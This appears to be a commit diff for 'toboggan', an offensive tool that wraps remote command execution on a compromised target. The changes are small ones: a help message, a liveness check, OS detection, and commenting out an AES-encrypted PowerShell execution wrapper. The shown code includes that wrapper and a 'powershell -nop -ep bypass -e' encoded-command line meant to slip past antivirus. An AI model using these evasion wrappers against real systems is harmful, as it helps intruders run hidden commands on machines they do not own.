Save changes

n3rada · Dec 12, 2024 · 5de6f4a · 5de6f4a
1 parent 72611ae
commit 5de6f4a
Show file tree

Hide file tree

Showing 3 changed files with 23 additions and 16 deletions.
diff --git a/toboggan/console.py b/toboggan/console.py
@@ -3,7 +3,6 @@
 # Built-in imports
 import argparse
 import sys
-import re
 
 # Local library imports
 from toboggan.src import terminal, target, executor, commands
@@ -140,6 +139,11 @@ def run() -> None:
     # Parse arguments
     args = parser.parse_args()
 
+    if len(sys.argv) == 1:
+        print("[Toboggan] No arguments provided.\n")
+        parser.print_help()
+        sys.exit(0)
+
     # Add validation for grouped arguments
     if args.url:
         if not args.params and not args.cmd_param:
@@ -194,6 +198,7 @@ def run() -> None:
 
     # You can instanciate a target that implement the Executor
     target_instance = target.Target(command_executor=executor_instance)
+
     # Thus, instanciate a Command class that implement the Target one's
     commands_instance = commands.Commands(
         target=target_instance, prefix=args.alias_prefix

diff --git a/toboggan/src/executor.py b/toboggan/src/executor.py
@@ -280,9 +280,9 @@ def is_alive(self) -> bool:
         start_time = time.time()
 
         try:
-            self.execute(command="whoami", timeout=5)
+            self.execute(command="", timeout=5)
         except Exception as error:
-            print(f"[Toboggan] Impossible to reach the target 🎯.")
+            print("[Toboggan] Impossible to reach the target 🎯.")
             print(f"[Toboggan] Root cause: {error}")
             return False
         else:
@@ -308,11 +308,13 @@ def os_guessing(self) -> str:
         """
         result = self.__module.execute(command="PATH")
 
+        print(f"[Toboggan] Guessing OS with output: {result}")
+
         if "not recognized as the name of a cmdlet" in result:
             print("[Toboggan] Detected PowerShell behavior; assuming Windows OS 🖥️.")
             return "windows"
 
-        if "PATH=C:\Windows\system32;" in result:
+        if r"C:\Windows\system32;" in result:
             print("[Toboggan] Detected DOS behavior; assuming Windows OS 🖥️.")
             return "windows"
 

diff --git a/toboggan/src/operating_systems.py b/toboggan/src/operating_systems.py
@@ -452,24 +452,24 @@ class WindowsHandler(OSHandler):
     AES_DECRYPT = r"function B64ToByte($b64){[Convert]::FromBase64String($b64)}$eb=B64ToByte '{ENCRYPTED}';$kb=B64ToByte '{KEY}';$iv=B64ToByte '{IV}';$aes=New-Object Security.Cryptography.AesManaged;$aes.Mode='CBC';$aes.Padding='PKCS7';$aes.BlockSize=128;$aes.KeySize=128;$aes.Key=$kb;$aes.IV=$iv;$d=$aes.CreateDecryptor().TransformFinalBlock($eb,0,$eb.Length);try{&([scriptblock]::Create([Text.Encoding]::UTF8.GetString($d)))}catch{$_}"
 
     def prepare_command(self, command: str) -> str:
-        encrypted, key, iv = utils.aes_encrypt(command=command)
+        # encrypted, key, iv = utils.aes_encrypt(command=command)
 
-        command = (
-            self.AES_DECRYPT.replace("{ENCRYPTED}", encrypted)
-            .replace("{KEY}", key)
-            .replace("{IV}", iv)
-        )
+        # command = (
+        #     self.AES_DECRYPT.replace("{ENCRYPTED}", encrypted)
+        #     .replace("{KEY}", key)
+        #     .replace("{IV}", iv)
+        # )
 
-        # Prepare last command
-        powershell_command = f"powershell -noni -nop -ep bypass -e {utils.base64_for_powershell(command=command)}"
+        # # Prepare last command
+        # powershell_command = f"powershell -noni -nop -ep bypass -e {utils.base64_for_powershell(command=command)}"
 
-        # Problem remaining is the CLIXML output
-        return powershell_command
+        # # Problem remaining is the CLIXML output
+        return command
 
     def unobfuscate_result(self, result: str) -> str:
         if "contains malicious content" in result:
             print(
-                f"[Toboggan] A malicious content has been blocked by the antivirus software."
+                "[Toboggan] A malicious content has been blocked by the antivirus software."
             )
             return
 
@@ -637,7 +637,7 @@ def _handle_os_specific_cases(self) -> None:
 
     def __analyse_path_variable(self) -> None:
         raw_path = self._execute(command="$env:PATH").strip()
-        print(f"[Toboggan] Binary and script searching order (PATH):")
+        print("[Toboggan] Binary and script searching order (PATH):")
         for index, entry in enumerate(raw_path.split(";"), start=1):
             print(f"\t{index}. {entry}")